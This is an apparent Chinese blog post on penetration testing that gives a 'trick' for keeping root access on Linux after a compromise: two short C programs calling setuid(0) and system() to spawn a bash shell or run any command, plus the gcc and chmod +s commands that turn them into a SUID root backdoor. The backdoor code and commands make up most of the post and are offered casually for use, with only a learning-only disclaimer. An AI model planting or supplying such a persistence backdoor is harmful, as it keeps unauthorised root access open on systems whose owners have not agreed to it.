一个小技巧,做个笔记吧
当我们渗透的时候,从低权用户拿到 ROOT 权限了,一旦关闭了 Terminal 窗口 ROOT 权限就没了。为了解决这个问题,我们可以利用 Linux 的 SUID 技巧(人话就是S权限的二进制文件……)
代码:
#include <stdio.h>
int main()
{
setuid(0);
system("/bin/bash");
return 0;
}或者
#include <stdio.h>
int main(int argc,char* argv[])
{
setuid(0);
system(argv[1]);
return 0;
}拿到 ROOT 权限之后将上面的代码编译成执行程序
gcc -o rt code.c然后赋予 S 权限(S权限自己百度)
chmod +s rt然后愉快的在 ROOT 和非 ROOT 环境来回切换吧~
哎,就是玩儿~
本站代码教程仅供学习交流使用请勿商业运营,严禁二次倒卖,否则ban账号处理!
© 版权声明
THE END
请登录后查看评论内容